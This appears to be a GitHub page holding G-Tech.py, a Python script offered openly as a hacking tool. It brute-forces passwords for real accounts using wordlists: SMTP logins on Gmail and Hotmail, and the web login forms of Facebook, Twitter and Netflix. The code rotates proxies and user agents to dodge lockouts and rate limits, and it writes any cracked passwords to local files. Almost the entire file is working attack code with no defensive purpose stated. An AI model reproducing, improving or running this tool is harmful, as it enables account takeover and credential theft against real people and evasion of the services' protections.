-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathG-Tech.py
More file actions
262 lines (244 loc) · 10.9 KB
/
G-Tech.py
File metadata and controls
262 lines (244 loc) · 10.9 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
#!/usr/bin/python
# -*- coding: utf-8 -*-
import smtplib
import threading
from optparse import *
import time
try :
from proxylist import ProxyList
except:
print("pip3 install proxylist ")
try :
from mechanize import Browser
except:
print("pip3 install mechanize")
from os import *
import sys
import logging
import io
import random
try:
import cookielib
except:
import http.cookiejar as cookielib
try:
import mechanize
except:
print("pip3 install mechanize ")
R = '\033[31m' # red
G = '\033[32m' # green
W = '\033[0m' # white
use = OptionParser("""{}
Welcome Young Hacker...
Ready, 1 2 3!
{}
-----------------------------------------------------------------------
-g --gmail for gmail @gmail.com
-t --hotmail for hotmail @hotmail.com
-T --twitter for twitter @
-f --facebook for facebook @
-n --netflix for Netflix @
-l --list set a list Password BruteForce
-p --password set a single Password
-X --proxy set a proxy list
""".format(G,R))
use.add_option("-g","--gmail",dest="gmail",help="Gmail")
use.add_option("-t","--hotmail",dest="hotmail",help="Hotmail")
use.add_option("-T","--twitter",dest="twitter",help="Twitter")
use.add_option("-f","--facebook",dest="facebook",help="Facebook")
use.add_option("-n","--netflix",dest="netflix",help="Netflix")
use.add_option("-l","--list",dest="list_password",help="Wordlist")
use.add_option("-p","--password",dest="password",help="Single Password")
use.add_option("-X","--proxy",dest="proxy",help="Proxy")
(options,args) = use.parse_args()
brows = Browser()
brows.set_handle_robots(False)
brows._factory.is_html = True
brows.set_cookiejar(cookielib.LWPCookieJar())
useragents = [
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081202 Firefox (Debian-2.0.0.19-0etch1)',
'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6']
brows.addheaders = [('User-agent',random.choice(useragents))]
brows.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
proxyList = options.proxy
def proxy():
logging.basicConfig()
pl = ProxyList()
try:
pl.load_file(proxyList)
except:
sys.exit('[!] Proxy incorrect | exiting now...')
pl.random()
getProxy = pl.random().address()
brows.set_proxies(proxies={"https": getProxy})
try:
checkProxyIP = brows.open("https://api.ipify.org/?format=raw", timeout=10)
except:
return proxy()
def Netflix():
password_list = io.open(options.list_password,"r").readlines()
try_login = 0
print("\r Netflix Account: {}".format(options.netflix))
print("%s<<<<<<+++++Beginning of Brute Email+++++>>>>>%s"%(R,W))
for password in password_list:
password = password.rstrip('\n')
try_login += 1
if try_login == 10:
try_login = 0
proxy()
print('\rPassword [==] {} '.format(password).rstrip("\n"))
sys.stdout.flush
url = "https://www.netflix.com/sa/login"
try:
brows.open(url, timeout=10)
brows.select_form(nr=0)
brows.form['userLoginId'] = options.netflix
brows.form['password'] = password
brows.method = "POST"
submit = brows.submit()
if 'https://www.netflix.com/browse' in submit.geturl():
print("{}[True][+] Password Found [{}][+]".format(G,password))
Save = io.open("Netflix.txt","a").write("Account Netflix:"+options.netflix+"\t\tPassword:"+password+"\n")
break
else :
print("%s[!] Oh uh, ERROR\n"%(R,W))
except:
print('[!] <<<There are speeches in communication>>> \n')
proxy()
def facebook():
password_list = io.open(options.list_password,"r").readlines()
try_login = 0
print("\rFacebook Account: {}".format(options.facebook))
print("%s<<<<<<+++++Starting Seach Email+++++>>>>>%s"%(R,W))
for password in password_list:
password = password.rstrip('\n')
try_login += 1
if try_login == 10:
try_login = 0
proxy()
print('\rPassword [==] {} '.format(password).rstrip("\n"))
sys.stdout.flush
url = "https://ar-ar.facebook.com/login"
try:
brows.open(url, timeout=5)
brows.select_form(nr=0)
brows.form['email'] = options.facebook
brows.form['pass'] = password
brows.method = "POST"
submit = brows.submit()
if 'https://www.facebook.com/?sk=welcome' in submit.geturl():
print("{}[True][+] Password Found [{}][+]".format(G,password))
Save = io.open("Facebook.txt","a").write("Account Facebook:"+options.facebook+"\t\tPassword:"+password+"\n")
break
else :
print("%s[!] Oh uh, Error%s\n"%(R,W))
except:
print('[!] <<<There are speeches in communication>>> \n')
proxy()
def twitter():
password_list = io.open(options.list_password,"r").readlines()
try_login = 0
print("\rTwitter Account: {}".format(options.twitter))
print("%s<<<<<<+++++Starting Search Email+++++>>>>>%s"%(R,W))
for password in password_list:
password = password.rstrip('\n')
try_login += 1
if try_login == 10:
try_login = 0
proxy()
print('\rPassword [==] {} '.format(password).rstrip("\n"))
sys.stdout.flush
url = "https://mobile.twitter.com/login"
try:
brows.open(url, timeout=5)
brows.select_form(nr=0)
brows.form['session[username_or_email]'] = options.twitter.strip()
brows.form['session[password]'] = password
brows.method = "POST"
submit = brows.submit()
if submit.geturl() == "https://mobile.twitter.com/":
print("{}[True][+] Password Found [{}][+]".format(G,password))
Save = io.open("Twitter.txt","a").write("Account Twitter:"+options.twitter+"\t\tPassword:"+password+"\n")
break
elif submit.geturl() == "https://mobile.twitter.com/home":
print("{}[True][+] Password Found [{}][+]".format(G,password))
Save = io.open("Twitter.txt","a").write("Account Twitter:"+options.twitter+"\t\tPassword:"+password+"\n")
break
elif 'https://mobile.twitter.com/account/login_challenge' in submit.geturl():
print("{}[True][+] Password Found [{}][+]".format(G,password))
Save = io.open("Twitter.txt","a").write("Account Twitter:"+options.twitter+"\t\tPassword:"+password+"\n")
break
elif 'https://mobile.twitter.com/account/locked' in submit.geturl():
proxy()
else:
print("%s[!] Oh uh, Error%s\n"%(R,W))
except:
print('[!] <<<There are speeches in communication>>> \n')
proxy()
if options.gmail == None :
if options.hotmail == None :
if options.twitter == None:
if options.facebook == None:
if options.netflix == None :
print(use.usage)
exit()
elif options.hotmail != None or options.gmail == None:
smtp_srverH= smtplib.SMTP('smtp.live.com', 587)
smtp_srverH.ehlo()
smtp_srverH.starttls()
if options.password != None or options.list_password == None :
print("%s<<<<<<+++++Beginning Brute Email+++++>>>>>%s"%(R,W))
try :
smtp_srverH.login(options.hotmail,options.password)
print("Password Found :{} \t Found Hotmail:{}".format(options.password,options.hotmail))
Save = io.open("Hotmail.txt","a").write("Account Hotmail:"+options.hotmail+"\t\tPassword:"+options.password+"\n")
except :
print("No Password Found : {} \t Email Hotmail:{}".format(options.password,options.hotmail))
elif options.list_password !=None or options.password == None :
password_list = io.open(options.list_password,"r").readlines()
for password in password_list:
try :
print("%s<<<<<<+++++Beginning Brute Email+++++>>>>>%s"%(R,W))
smtp_srverH.login(options.hotmail,password)
print("Password Found :{} \n Found Hotmail:{}".format(password,options.hotmail))
Save = io.open("Hotmail.txt","a").write("Account Hotmail:"+options.hotmail+"\t\tPassword:"+password+"\n")
except smtplib.SMTPAuthenticationError:
print("No Password Found : {} \t Email Hotmail:{}".format(password,options.hotmail))
if options.twitter != None :
hejab = threading.Thread(target=twitter,name="hejab")
hejab.start()
if options.facebook != None :
facebook = threading.Thread(target=facebook,name="facebook")
facebook.start()
if options.netflix != None:
netflix = threading.Thread(target=Netflix,name="Netflix")
netflix.start()
elif options.gmail !=None or options.hotmail== None or options.twitter==None:
smtp_srverG= smtplib.SMTP('smtp.gmail.com', 587)
smtp_srverG.ehlo()
smtp_srverG.starttls()
if options.password != None or options.list_password == None :
print("%s<<<<<<+++++НАЧАЛО ПЕРЕБОРА Email+++++>>>>>%s"%(R,W))
try :
smtp_srverG.login(options.gmail,options.password)
print("Найден пароль :{} \t Found Gmail:{}".format(options.password,options.gmail))
Save = io.open("Gmail.txt","a").write("Account Gmail:"+options.gmail+"\t\tPassword:"+options.password+"\n")
except :
print("Не найдены пароли : {} \t Email Gmail:{}".format(options.password,options.gmail))
elif options.list_password !=None:
password_list = io.open(options.list_password,"r").readlines()
for password in password_list:
password = password.rstrip("\n")
print("%s<<<<<<+++++Beginning Brute Email+++++>>>>>%s"%(R,W))
try :
smtp_srverG.login(options.gmail,password)
print("{}<<<+++Password Found :{} \t Found Gmail:{}+++>>>".format(G,password,options.gmail))
Save = io.open("Gmail.txt","a").write("Account Gmail:"+options.gmail+"\t\tPassword:"+password+"\n")
break
except smtplib.SMTPAuthenticationError:
print("{}<<<---No Password Found : {} \t Email Gmail:{}--->>>".format(R,password,options.gmail))
else:
print(use.usage)
exit()